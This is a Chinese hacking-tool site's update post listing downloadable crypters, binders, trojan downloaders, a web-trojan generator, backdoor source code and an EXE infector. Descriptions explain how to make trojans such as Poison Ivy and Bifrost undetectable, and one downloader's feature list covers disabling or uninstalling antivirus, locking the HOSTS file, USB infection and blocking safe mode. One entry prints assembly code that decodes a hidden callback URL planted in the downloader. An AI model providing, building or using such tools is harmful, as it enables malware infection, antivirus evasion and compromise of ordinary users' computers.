[06.30]黑客精品软件更新[软件兵器库整理]

友情提示:
1. 此更新合集由软件兵器库整理，图片上传到免费空间,可能观看速度有些慢,请耐心等待下!
2. 所有软件均来自网络，我们保证您下载的软件无任何捆绑,至于有无后门请自行检测!
3. 软件上传于免费网盘, 点击进入下载地址后等待10秒中 即可出现下载地址进行下载!
4. 对于使用工具造成的一切违法行为一律与本站无关!
5. 欢迎访问软件兵器库 专注收集更新国内外最新黑软! 地址: http://hacktools.uu1001.com
6. 关于无法打开某些VB的免杀软件.捆绑器等等 请看: http://hacktools.uu1001.com/read.php?tid=755

引用:

今日更新列表:
1. [捆绑器] ArexX Simple Crypter V2汉化版
2. [捆绑器] Rude Surprise (捆绑器)
3. [免杀软件] Cigicigi Crypter v1.0
4. [免杀软件] W4nNa-D!E Crypter
5. [免杀软件] Moruk_creW_Crypter
6. [下载者] 终结者下载器[去后门版]  
7. [下载者] 护马使者{080629}
8. [木马后门] 神专用VIP网马生成器
9. [程序源代码]  SHIFT后门功能版原码
10. [程序源代码] 感染exe运行DLL   

引用:

1. ArexX Simple Crypter V2汉化版
软件大小: 486.87 KB
软件说明:
原版下载: http://hacktools.uu1001.com/read.php?tid=878

程序截图:

点击进入下载页面
2. Rude Surprise (捆绑器)
软件大小: 236.59 KB
软件说明:
效果自测~~~~~~~~

程序截图:

点击进入下载页面
3. Cigicigi Crypter v1.0
软件大小: 1.04 MB
软件说明:
[+]You can make any virus/trojan undedected.(scantime and runtime)
[+]You can prevent your programs.
[+]You can use it to change programs's icons.
Usage :
-------
[1]Click "Find File" button to select the file that you want to crypt.
[2]If file contains EOF data,click on checkbox.(Some trojans have this;Poison Ivy,Bifrost,Flux,etc.)
[3]Select your password..This tool will create a different copy for each password.
[4]If you want to change icon :
a)Press "Find Icon" button to select icon.
b)You can select default icon by clicking "Default Icon" button.
Icon Hunter :
-------------
You can get any program's icon with this tool.
Firstly click "Icon Hunter" button,after that select the application to get icons from.
All icons will be extracted to current directory.
[5]Press "Create File" button,and select where to save crypted file.
[6]Your crypted file is ready,now you can use it..

Properties :
[+]Cigicigi File Crypter uses XOR encryption.
[+]Uses "user level unhooking".So firewalls can't say that the file is infected.
[+]Cigicigi File Crypter supports EOF data.So you can also crypt Flux,Bifrost,Poison Ivy,etc.. servers.

程序截图:


点击进入下载页面
4. W4nNa-D!E Crypter  
软件大小: 380.54 KB
软件说明:
效果自测~~~~~~~~~~

程序截图:

点击进入下载页面
5. Moruk_creW_Crypter
软件大小: 325.73 KB
软件说明:
一个私密版本，效果自测!
程序截图:

点击进入下载页面

引用:

6. 终结者下载器[去后门版]  
软件大小: 624.55 KB
软件说明:
作者: 叫我女王
终结者下载器，采用C++编写，极大了减少了体积，加壳后才4K，拥有众多VIP下载者的超强功能。
功能介绍中的所有功能都可以使用，没有任何限制！
附加说明:
程序中有多数可疑代码。为了防止不必要的纠纷。。。
这里清楚掉原有的可疑代码。。。
如果你在逆向的时候发现有大量的nop那个就是了。。。
附上解码代码:
//把文件的$1064位置的加密字符串--到$00结尾的字符串复制到代码种进行解码
//得到结果:http://1.d5x8.cn/tj.asp
function DeCode(lpBuffer1, lpBuffer2: PChar): Integer; cdecl;
const
  arg_0 = $4;
  arg_4 = $8;
asm
  leave
  push    ebx
  push    esi
  mov    esi, [esp+8+arg_0]
  push    edi
  mov    edi, esi
  or      ecx, 0FFFFFFFFh
  xor    eax, eax
  xor    ebx, ebx
  xor    edx, edx
  repne scasb
  not    ecx
  dec    ecx
  test    ecx, ecx
  jle    @@loc_13142048
@@loc_1314201B:
  mov    al, [edx+esi+1]
  mov    cl, [edx+esi]
  add    al, 6
  sub    cl, 8
  and    al, 0Fh
  mov    edi, esi
  shl    cl, 4
  add    al, cl
  mov    ecx, [esp+0Ch+arg_4]
  mov    [ebx+ecx], al
  inc    ebx
  inc    edx
  or      ecx, 0FFFFFFFFh
  xor    eax, eax
  inc    edx
  repne scasb
  not    ecx
  dec    ecx
  cmp    edx, ecx
  jl      @@loc_1314201B
@@loc_13142048:
  mov    eax, [esp+0Ch+arg_4]
  pop    edi
  pop    esi
  and    byte ptr [ebx+eax], 0
  xor    eax, eax
  pop    ebx
  retn
end;
procedure TForm1.Button1Click(Sender: TObject);
const
  //  1064
  StrUrl =  #$7E#$82#$7F#$7E#$7F#$7E#$7F#$7A#$7B#$84#$7A#$89 +
            #$7A#$89#$7B#$7B#$7A#$88#$7E#$7E#$7B#$7F#$7F#$82 +
            #$7B#$82#$7A#$88#$7E#$7D#$7E#$88#$7A#$89#$7F#$7E +
            #$7E#$84#$7A#$88#$7E#$7B#$7F#$7D#$7F#$7A;
var
  szBuffer: Array[0..46] Of Char;
  szDeBuffer: Array[0..46] Of Char;
begin
  ZeroMemory(@szBuffer, SizeOf(szBuffer));
  DeCode(StrUrl, @szDeBuffer);
  Edit1.Text := PChar(@szDeBuffer);
end;

程序截图:

点击进入下载页面
7. 护马使者{080629}
软件大小: 232.95 KB
软件说明:
软件名称：护马使者  集{动态防护+下载器}于一体

版本号：08/06/29  通过 卡巴 瑞星 金山 最新病毒库检测

注：本程序未使用任何HOOK钩子，不会与你的小马产生任何冲突，可放心使用

主要功能及特色：(养马人(插件)的好帮手)
----------------------------------------------------------------------------
　(*　注：本程序只可用来研究，不可用来做违法事宜，作者不承担任何后果　*)

  新增功能：障碍移除(可移除更多的竟争对手 下载者 或 木马 重启后生效)

    使用方法和无限下载基本类似，在TXT文件里填入要移除文件的完整路径，此功能
   
    适合有一定基础的用户使用，首先要分析对方程序运行后的各个文件的完整路径
    (*注意：不可错移系统文件哦*)，填入TXT上传空间即可使用，程序运行5分钟后
    开始执行移除工作，具体使用方法参考 (主程序) 文件，新手搞明白方可使用！

  移除名单：(收集的是一些流行的下载者，觉得妨碍自己的程序可自行进行增减)
  
    见移除名单文件(del.txt)！！！

  动态防护：(尽量为保护自身和小马而战斗)

    大部分专杀是通过，网站下载，邮件，QQ，MSN 等传来传去的，所以本程序会动态
　　监视 C D E F G H 六大硬盘分区里的 EXE CMD COM BAT PIF SCR 六大可执行程序
　　扩展名，如果进行 下载 新建 改名 复制 等操作　(包括用 "迅雷" 下载，如果下
　　载的是RAR压缩包，解压或直接从RAR压缩包中运行即 删除或失效)，发现是专杀则
　　立即查杀，删除，这样即在专杀没运行前就被删除，用户也就没有机会在运行专杀。

  防护名单：(目前只反杀了如下程序，新版继续添加，服务端可进行远程自升级)
  
    见防护名单文件！！！
----------------------------------------------------------------------------
  传统功能：
    1.程序提供 10项下载 及 无限下载 ，填写时记得选择延时下载的时间。
    2.本程序服务端具有远程更新功能，10项下载 及 无限下载 均可升级自身。
    3.程序采用双进程守护方式运行，用户可随机选择 5 - 8 位不同长度的进程名。
    4.程序仍然采用感染 硬盘分区 和 U盘分区 的功能，同时破AUTO包括NTFS的免疫。
    5.程序运行后，会关闭一次QQ程序，彻底封锁QQ医生，否则 QQ.exe 会不定时的跳出来进行查杀。
    6.程序提供3个U盘伪装文件填写，使用则钩选后填入你想填的欺骗文字(最长8个中文),会在对方U盘里生成。
    7.程序对老版本的卡巴进行改时间跳过 主动防御，新版本的则直接调用 卸载程序卸载，瑞星则直接进行卸载操作。
    8.程序仍然采用网页关键字查杀方式，以便对在线 查毒，杀毒，下载专杀，等关键字进行屏蔽，尽可能的保护自己。
    9.程序采用独占方式锁定系统启动配置文件，防止XDELBOX这类程序进行重启删除，防不了的加入 "防护名单"　删除。
  10.程序运行后清空系统的HOSTS文件，然后以独占方式锁定，防止用户或某些软件写HOSTS屏蔽网址，影响下载功能。
  11.提供隐藏弹窗统计功能，程序运行5分钟后，弹出你指定的统计地址，30秒后自动关闭。
  12.屏蔽系统　安全模式，印像劫持，自删除，等等功能，不在多说了，用户可自行测试。
  使用注意事项：
   
    见主程序！！！

程序截图:

点击进入下载页面
8. 神专用VIP网马生成器
软件大小: 545.8 KB
软件说明:
效果大家自测吧.2个版本!
程序截图:


点击进入下载页面
9. SHIFT后门功能版原码
软件大小: 7 KB
软件说明:
功能可以加强，后门也可以自己定义， VB代码
程序截图:

点击进入下载页面
10. 感染exe运行DLL  
软件大小: 43 KB
软件说明:
VC代码
黑防一期的感染exe调用DLL
程序截图:
暂无
点击进入下载页面